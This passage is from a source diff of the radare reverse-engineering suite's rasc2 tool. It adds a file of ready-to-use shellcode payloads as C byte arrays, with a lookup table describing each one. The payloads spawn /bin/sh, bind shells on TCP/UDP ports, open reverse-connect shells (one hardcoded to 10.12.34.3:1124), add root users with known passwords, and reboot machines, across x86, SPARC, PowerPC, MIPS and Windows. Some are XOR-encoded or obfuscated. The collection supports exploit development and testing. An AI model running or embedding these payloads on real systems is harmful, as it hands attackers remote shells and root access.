"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83"
"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48"
"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED"
"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05";
#define ENTRY(a,b,c,x,y,z) { .name=x, .desc=z, .data=(unsigned char *)&y, .len=sizeof(y)-1, \
.cmd=a, .host=b, .port=c },
#define ENTRY_NULL() { NULL, NULL, NULL, 0 }
struct shellcode_t shellcodes[] = {
ENTRY(0,0,0,"arm.linux.adduser", arm_linux_adduser, "Adds root user 'shell-storm' with password 'toor'" )
ENTRY(0,0,0,"arm.linux.binsh", arm_linux_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.thumb", arm_linux_thumb, "Runs /bin/sh using thumb mode trick" )
ENTRY(0,0,0,"arm.linux.suidsh", arm_linux_suidsh, "Setuid and runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.bind", arm_linux_bind, "Binds /bin/sh to a tcp port" )
ENTRY(0,0,30,"armle.osx.reverse", armle_osx_reverse, "iPhone reverse connect shell to HOST and PORT" )
ENTRY(0,0,0,"dual.linux.binsh", x86_ppc_linux_binsh, "x86/ppc MacOSX /bin/sh shellcode" )
ENTRY(0,0,0,"dual.osx.binsh", x86_ppc_osx_binsh, "Runs /bin/sh (works also on x86) (dual)" )
ENTRY(0,0,0,"mips.linux.binsh", mips_linux_binsh, "Runs /bin/sh (tested on loongson2f)." )
ENTRY(0,0,0,"ppc.osx.adduser", ppc_osx_adduser, "Adds a root user named 'r00t' with no pass." )
ENTRY(0,0,0,"ppc.osx.binsh", ppc_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"ppc.osx.binsh0", ppc_osx_binsh0, "Executes /bin/sh (with zeroes)" )
ENTRY(0,0,0,"ppc.osx.bind4444", ppc_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"ppc.osx.reboot", ppc_osx_reboot, "Reboots the box" )
ENTRY(0,0,0,"ppc.bsd.binsh", ppc_bsd_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"sparc.linux.binsh", sparc_linux_binsh, "Runs /bin/sh on sparc/linux" )
ENTRY(0,0,0,"sparc.linux.bind4444", sparc_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"sparc.linux.binsh2", sparc_linux_javicoder_binsh, "Runs /bin/sh on sparc/linux (coder)" )
ENTRY(0,0,0,"sparc.linux.bind1124", sparc_linux_javicoder_portbind, "Listen shell at 1124" )
ENTRY(0,0,0,"sparc.linux.connect", sparc_linux_javicoder_connect, "Connects to 10.12.34.3 : 1124")
//ENTRY(0,0,0,"ia64.linux.binsh", ia64_linux_binsh, "Executes /bin/sh on Intel Itanium" )
ENTRY(0,0,0,"x64.linux.binsh", x64_linux_binsh, "Runs /bin/sh on 64 bits" )
ENTRY(0,0,0,"x64.osx.suidsh", x64_osx_suidsh, "Setuid(0) and runs /bin/sh")
ENTRY(0,43,39,"x64.osx.reverse", x64_osx_reverse_tcp, "OSX reverse connect shell")
ENTRY(0,0,0,"x86.bsd.binsh", x86_bsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.binsh2", x86_bsd_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.suidsh", x86_bsd_suidsh, "Setuid(0) and runs /bin/sh" )
ENTRY(0,0,0,"x86.bsd.bind4444", x86_bsd_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.bsdlinux.binsh", x86_bsdlinux_binsh, "Dual linux/bsd shellcode runs /bin/sh" )
ENTRY(0,0,0,"x86.freebsd.reboot", x86_freebsd_reboot, "Reboots target box" )
ENTRY(0,0,0,"x86.freebsd.reverse", x86_freebsd_reverse, "Reboots target box" )
ENTRY(0,0,0,"x86.linux.adduser", x86_linux_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.linux.bind4444", x86_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"x86.linux.binsh", x86_linux_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh1", x86_linux_binsh1, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh2", x86_linux_binsh2, "Executes /bin/sh" )
ENTRY(43,0,0,"x86.linux.binsh3", x86_linux_binsh3, "Executes /bin/sh or CMD" )
ENTRY(0,0,0,"x86.linux.udp4444", x86_linux_udp4444, "Binds a shell at UDP port 4444" )
ENTRY(0,0,0,"x86.netbsd.binsh", x86_netbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.binsh", x86_openbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.bind6969", x86_openbsd_bind6969, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh", x86_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh2", x86_osx_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.bind4444", x86_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.solaris.binsh", x86_solaris_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"x86.solaris.binshu", x86_solaris_binshu, "Runs /bin/sh (toupper() safe)" )
ENTRY(0,0,0,"x86.solaris.bind4444", x86_solaris_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.msg", x86_w32_msg, "Shows a MessageBox" )
ENTRY(0,0,0,"x86.w32.cmd", x86_w32_cmd_exit, "Runs cmd.exe and ExitThread" )
ENTRY(0,0,0,"x86.w32.adduser", x86_w32_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.w32.bind4444", x86_w32_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.tcp4444", x86_w32_tcp4444, "Binds a shell at port 4444" )
ENTRY_NULL()
};
#if 0
main()
{
void (*punk)() = &x86_linux_binsh;
punk();
printf("%s\n", shellcodes[0].desc);
}
#endif

936
binr/rasc2/shellcodes.c.src Normal file

@ -0,0 +1,936 @@
/*
* Copyright (C) 2007-2011
* pancake <nopcode.org>
*
* radare is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* radare is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with radare; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
// XXX: shellcodes are ended with '\0'. so they should not contain any '\0'
#include <stdio.h>
#include "rasc.h"
// moar at:
// http://www.groar.org/expl/openbsd/english.shtml
#if SELFSTOP
#define RET 0x80494c0
// 1) buscar jmp de 5 bytes
#define INJECT jmp $delta-$here-10
linux_selfsigstop:
push RET
/* 68 34 de 04 08 */
pusha
mov $20, %eax
int $0x80
mov %eax, %ebx /* pid */
mov $19, %ecx /* stop */
mov $37, %eax /* kill */
int $0x80
popa
ret
freebsd_selfsigstop:
push RET_ADDR
pusha
mov $20, %eax
push %ebp
int $0x80
pop %ebp
push $17
push %eax
mov $37, %eax
push %ebp
int $0x80
pop %ebp
pop %ebp
pop %ebp
popa
ret
#endif
#if 0
// dump warns and it has not been tested.. out!
/* from phrack57 */
unsigned long long ia64_linux_binsh[] = {
/* MLX
* alloc r34 = ar.pfs, 0, 3, 3, 0 // allocate vars for syscall
* movl r14 = 0x0168732f6e69622f // aka "/bin/sh",0x01
* ;; */
0x2f6e458006191005,
0x631132f1c0016873,
/* MLX
* xor r37 = r37, r37 // NULL
* movl r17 = 0x48f017994897c001 // bundle[0]
* ;; */
0x9948a00f4a952805,
0x6602e0122048f017,
/* MII
* adds r15 = 0x1094, r37 // unfinished bundle[1]
* or r22 = 0x08, r37 // part 1 of bundle[1]
* dep r12 = r37, r12, 0, 8 // align stack ptr
* ;; */
0x416021214a507801,
0x4fdc625180405c94,
/* MII
* adds r35 = -40, r12 // circling mem addr 1, shellstr addr
* adds r36 = -32, r12 // circling mem addr 2, args[0] addr
* dep r15 = r22, r15, 56, 8 // patch bundle[1] (part 1)
* ;; */
0x0240233f19611801,
0x41dc7961e0467e33,
/* MII
* st8 [r36] = r35, 16 // args[0] = shellstring addr
* adds r19 = -16, r12 // prepare branch addr: bundle[0] addr
* or r23 = 0x42, r37 // part 2 of bundle[1]
* ;; */
0x81301598488c8001,
0x80b92c22e0467e33,
/* MII
* st8 [r36] = r17, 8 // store bundle[0]
* dep r14 = r37, r14, 56, 8 // fix shellstring
* dep r15 = r23, r15, 16, 8 // patch bundle[1] (part 2)
* ;; */
0x28e0159848444001,
0x4bdc7971e020ee39,
/* MMI
* st8 [r35] = r14, 25 // store shellstring
* cmp.eq p2, p8 = r37, r37 // prepare predicate for final branch.
* mov b6 = r19 // (+0x01) setup branch reg
* ;; */
0x282015984638c801,
0x07010930c0701095,
/* MIB
* st8 [r36] = r15, -16 // store bundle[1]
* adds r35 = -25, r35 // correct string addr
* (p2) br.cond.spnt.few b6 // (+0x01) branch to constr. bundle
* ;; */
0x3a301799483f8011,
0x0180016001467e8f,
};
#endif
unsigned char nopcode_carver[] =
"\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3";
unsigned char x86_linux_binsh[] =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
unsigned char x86_linux_binsh1[] = // -( nemo )-
"\xeb\x10\x5b\x31\xc0\x50\x53\xb0\x0b\x88\x63\x07\x89\xe1\x31\xd2\xcd\x80\xe8\xeb\xff\xff\xff/bin/shX";
/* 0xcafebabe.it */
unsigned char x86_linux_binsh2[] =
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int mips_linux_binsh[] = {
0x00842026, 0x24020fb7, 0x0000000c, 0x3c086e69, 0x3508622f, 0x3c090068,
0x3529732f, 0xafa80000, 0xafa90004, 0xafbd0008, 0xafa0000c, 0x03a02021,
0x23a50008, 0x00003021, 0x24020fab, 0x0000000c, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000 };
char sparc_linux_binsh[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10";
/* javicoder shellcodes
--------------------- beerware license
http://www.48bits.com/papers/sparc_shellcodes.txt
*/
char sparc_linux_javicoder_binsh[] =
"\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
"\xdc\xda\x90\x0b\x80\x0e\x82\x10\x20\x0b"
"\x91\xd0\x20\x10\x82\x10\x20\x01\x90\x1a"
"\x40\x09\x91\xd0\x20\x10";
/* listen shell at port 1124 */
char sparc_linux_javicoder_portbind[] =
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46\xe4\x25"
"\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46\x84\x12\x22\xd0"
"\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea\x92\x12\x26\x66\xd2\x39"
"\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe\xa4\x09\xc1\xea\x96\x12\x22\x12"
"\xd2\x25\xa2\x46\xe4\x25\xa2\x4a\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2"
"\x22\x12\xa4\x12\x22\x03\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe"
"\xd6\x25\xa2\x4e\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29"
"\xc1\xfa\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80\x93\xd2"
"\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc\x92\x0d\x82\x10"
"\x84\x12\x22\x0d\x93\xd2\x22\x12";
#if 0
( .. 11 instructions .. ) (+44 bytes+deobfusacte+nops)
mov 0x464, %l1 ! puerto 1124
sethi %hi(0x0a0c2203), %l2 !
or %l2, %lo(0x0a0c2203), %l2 ! direcci?n IP 10.12.34.3
#endif
char sparc_linux_javicoder_connect[] =
/* rutina desofuscadora */
"\x10\x80\x00\x0c\xa4\x1c\x80\x12\xa2\x03\xe0\x08\xe8\x0c\x40\x05"
"\xa4\x04\xa0\x01\xa8\x25\x20\x02\xe8\x2c\x40\x05\x80\xa4\xa0\xc4"
"\x04\xbf\xff\xfb\xa2\x04\x60\x01\x8b\xc3\xe0\x08\xa4\x1c\x80\x12"
"\x7f\xff\xff\xf6\x8a\x19\x40\x05"
/*
* NOPs por la i-cache
*/
"\x03\x02\x02\x02\x03\x02\x02\x02"
/*
* shellcode ofuscada
*/
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46"
"\xe4\x25\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46"
"\x84\x12\x22\xd0\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea"
"\x92\x12\x26\x66\xd2\x39\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe"
"\xa4\x09\xc1\xea\x96\x12\x22\x12\xd2\x25\xa2\x46\xe4\x25\xa2\x4a"
"\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2\x22\x12\xa4\x12\x22\x03"
"\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe\xd6\x25\xa2\x4e"
"\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29\xc1\xfa"
"\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80"
"\x93\xd2\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc"
"\x92\x0d\x82\x10\x84\x12\x22\x0d\x93\xd2\x22\x12";
unsigned char x86_linux_bind4444[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x81\x9c\x95"
"\xe9\x83\xeb\xfc\xe2\xf4\xb0\x47\xc6\xaa\xd2\xf6\x97\x83\xe7\xc4\x0c\x60"
"\x60\x51\x15\x7f\xc2\xce\xf3\x81\x90\xc0\xf3\xba\x08\x7d\xff\x8f\xd9\xcc"
"\xc4\xbf\x08\x7d\x58\x69\x31\xfa\x44\x0a\x4c\x1c\xc7\xbb\xd7\xdf\x1c\x08"
"\x31\xfa\x58\x69\x12\xf6\x97\xb0\x31\xa3\x58\x69\xc8\xe5\x6c\x59\x8a\xce"
"\xfd\xc6\xae\xef\xfd\x81\xae\xfe\xfc\x87\x08\x7f\xc7\xba\x08\x7d\x58\x69\x00";
unsigned char x86_linux_udp4444[] =
"\x33\xc9\x83\xe9\xe7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13\xec\x81"
"\xca\x83\xeb\xfc\xe2\xf4\x22\x37\xd2\xa0\x11\x86\x83\x89\x79\x8a\xd9\x43"
"\xf2\x21\x01\x59\x4a\x5c\xbe\x07\x93\xa5\xf8\x33\x48\xb6\xe9\xb5\x13\xec"
"\x80\xac\x7b\xfd\xdd\xac\x40\x65\x60\xa0\x03\xbd\xd2\x43\xf2\xaf\x31\xac"
"\xde\x6c\xeb\xc1\x4b\xbe\xe7\xa2\x3e\x85\x08\x2b\x79\x8b\xe7\xa2\x7a\x82"
"\xe9\xaf\x77\x85\xf5\xa2\x3e\xc1\xef\xa5\x9a\x0b\xd3\xa2\x3c\xc3\xf2\xa2"
"\x7b\xc3\xe3\xa3\x7d\x65\x62\x98\x42\xbb\xd2\x43\xf2\x21\x01\xca\x00";
unsigned char x86_linux_adduser[] =
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73"
"\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd"
"\x80\x93\xe8\x1f\x00\x00\x00\x78\x3a\x41\x7a\x37\x44\x71\x55\x7a\x47\x6a"
"\x77\x69\x4d\x77\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73"
"\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80";
unsigned char x86_bsd_binsh[] =
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51"
"\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd\x80";
unsigned char x86_bsd_binsh2[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53"
"\x50\xb0\x3b\xcd\x80";
unsigned char x86_bsd_bind4444[] =
"\x31\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
"\xd3\x61\x53\x83\xeb\xfc\xe2\xf4\xa4\xb2\x39\xca\x9c\xbb\x71\x51"
"\xdf\x8f\xe8\xb2\x9c\x91\x33\x11\x9c\xb9\x71\x9e\x4e\x4a\xf2\x02"
"\x9d\x81\x0b\x3b\x96\x1e\xe1\xe3\xa4\x1e\xe1\x01\x9d\x81\xd1\x4d"
"\x03\x53\xf6\x39\xcc\x8a\x0b\x09\x96\x82\x36\x02\x03\x53\x28\x2a"
"\x3b\x83\x09\x7c\xe1\xa0\x09\x3b\xe1\xb1\x08\x3d\x47\x30\x31\x07"
"\x9d\x80\xd1\x68\x03\x53\x61\x53";
unsigned char ppc_osx_binsh[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";
unsigned char ppc_osx_bind4444[] =
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";
unsigned char x86_w32_bind4444[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9f"
"\x2a\xdf\x1b\x83\xeb\xfc\xe2\xf4\x63\x40\x34\x56\x77\xd3\x20\xe4"
"\x60\x4a\x54\x77\xbb\x0e\x54\x5e\xa3\xa1\xa3\x1e\xe7\x2b\x30\x90"
"\xd0\x32\x54\x44\xbf\x2b\x34\x52\x14\x1e\x54\x1a\x71\x1b\x1f\x82"
"\x33\xae\x1f\x6f\x98\xeb\x15\x16\x9e\xe8\x34\xef\xa4\x7e\xfb\x33"
"\xea\xcf\x54\x44\xbb\x2b\x34\x7d\x14\x26\x94\x90\xc0\x36\xde\xf0"
"\x9c\x06\x54\x92\xf3\x0e\xc3\x7a\x5c\x1b\x04\x7f\x14\x69\xef\x90"
"\xdf\x26\x54\x6b\x83\x87\x54\x5b\x97\x74\xb7\x95\xd1\x24\x33\x4b"
"\x60\xfc\xb9\x48\xf9\x42\xec\x29\xf7\x5d\xac\x29\xc0\x7e\x20\xcb"
"\xf7\xe1\x32\xe7\xa4\x7a\x20\xcd\xc0\xa3\x3a\x7d\x1e\xc7\xd7\x19"
"\xca\x40\xdd\xe4\x4f\x42\x06\x12\x6a\x87\x88\xe4\x49\x79\x8c\x48"
"\xcc\x79\x9c\x48\xdc\x79\x20\xcb\xf9\x42\xce\x47\xf9\x79\x56\xfa"
"\x0a\x42\x7b\x01\xef\xed\x88\xe4\x49\x40\xcf\x4a\xca\xd5\x0f\x73"
"\x3b\x87\xf1\xf2\xc8\xd5\x09\x48\xca\xd5\x0f\x73\x7a\x63\x59\x52"
"\xc8\xd5\x09\x4b\xcb\x7e\x8a\xe4\x4f\xb9\xb7\xfc\xe6\xec\xa6\x4c"
"\x60\xfc\x8a\xe4\x4f\x4c\xb5\x7f\xf9\x42\xbc\x76\x16\xcf\xb5\x4b"
"\xc6\x03\x13\x92\x78\x40\x9b\x92\x7d\x1b\x1f\xe8\x35\xd4\x9d\x36"
"\x61\x68\xf3\x88\x12\x50\xe7\xb0\x34\x81\xb7\x69\x61\x99\xc9\xe4"
"\xea\x6e\x20\xcd\xc4\x7d\x8d\x4a\xce\x7b\xb5\x1a\xce\x7b\x8a\x4a"
"\x60\xfa\xb7\xb6\x46\x2f\x11\x48\x60\xfc\xb5\xe4\x60\x1d\x20\xcb"
"\x14\x7d\x23\x98\x5b\x4e\x20\xcd\xcd\xd5\x0f\x73\x6f\xa0\xdb\x44"
"\xcc\xd5\x09\xe4\x4f\x2a\xdf\x1b\x00";
unsigned char x86_w32_tcp4444[] =
"\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7a"
"\xba\xcb\x13\x83\xeb\xfc\xe2\xf4\x86\xd0\x20\x5e\x92\x43\x34\xec"
"\x85\xda\x40\x7f\x5e\x9e\x40\x56\x46\x31\xb7\x16\x02\xbb\x24\x98"
"\x35\xa2\x40\x4c\x5a\xbb\x20\x5a\xf1\x8e\x40\x12\x94\x8b\x0b\x8a"
"\xd6\x3e\x0b\x67\x7d\x7b\x01\x1e\x7b\x78\x20\xe7\x41\xee\xef\x3b"
"\x0f\x5f\x40\x4c\x5e\xbb\x20\x75\xf1\xb6\x80\x98\x25\xa6\xca\xf8"
"\x79\x96\x40\x9a\x16\x9e\xd7\x72\xb9\x8b\x10\x77\xf1\xf9\xfb\x98"
"\x3a\xb6\x40\x63\x66\x17\x40\x53\x72\xe4\xa3\x9d\x34\xb4\x27\x43"
"\x85\x6c\xad\x40\x1c\xd2\xf8\x21\x12\xcd\xb8\x21\x25\xee\x34\xc3"
"\x12\x71\x26\xef\x41\xea\x34\xc5\x25\x33\x2e\x75\xfb\x57\xc3\x11"
"\x2f\xd0\xc9\xec\xaa\xd2\x12\x1a\x8f\x17\x9c\xec\xac\xe9\x98\x40"
"\x29\xf9\x98\x50\x29\x45\x1b\x7b\x7a\xba\xcb\x13\x1c\xd2\xda\x4f"
"\x1c\xe9\x42\xf2\xef\xd2\x27\xea\xd0\xda\x9c\xec\xac\xd0\xdb\x42"
"\x2f\x45\x1b\x75\x10\xde\xad\x7b\x19\xd7\xa1\x43\x23\x93\x07\x9a"
"\x9d\xd0\x8f\x9a\x98\x8b\x0b\xe0\xd0\x2f\x42\xee\x84\xf8\xe6\xed"
"\x38\x96\x46\x69\x42\x11\x60\xb8\x12\xc8\x35\xa0\x6c\x45\xbe\x3b"
"\x85\x6c\x90\x44\x28\xeb\x9a\x42\x10\xbb\x9a\x42\x2f\xeb\x34\xc3"
"\x12\x17\x12\x16\xb4\xe9\x34\xc5\x10\x45\x34\x24\x85\x6a\xa3\xf4"
"\x03\x7c\xb2\xec\x0f\xbe\x34\xc5\x85\xcd\x37\xec\xaa\xd2\x3b\x99"
"\x7e\xe5\x98\xec\xac\x45\x1b\x13";
char x86_w32_msg[]=
"\xeb"//xored with 0x1d
"\x10\x58\x31\xc9\x66\x81\xe9\x22\xff\x80\x30\x1d\x40\xe2\xfa\xeb\x05\xe8\xeb\xff"
"\xff\xff\xf4\xd1\x1d\x1d\x1d\x42\xf5\x4b\x1d\x1d\x1d\x94\xde\x4d\x75\x93\x53\x13"
"\xf1\xf5\x7d\x1d\x1d\x1d\x2c\xd4\x7b\xa4\x72\x73\x4c\x75\x68\x6f\x71\x70\x49\xe2"
"\xcd\x4d\x75\x2b\x07\x32\x6d\xf5\x5b\x1d\x1d\x1d\x2c\xd4\x4c\x4c\x90\x2a\x4b\x90"
"\x6a\x15\x4b\x4c\xe2\xcd\x4e\x75\x85\xe3\x97\x13\xf5\x30\x1d\x1d\x1d\x4c\x4a\xe2"
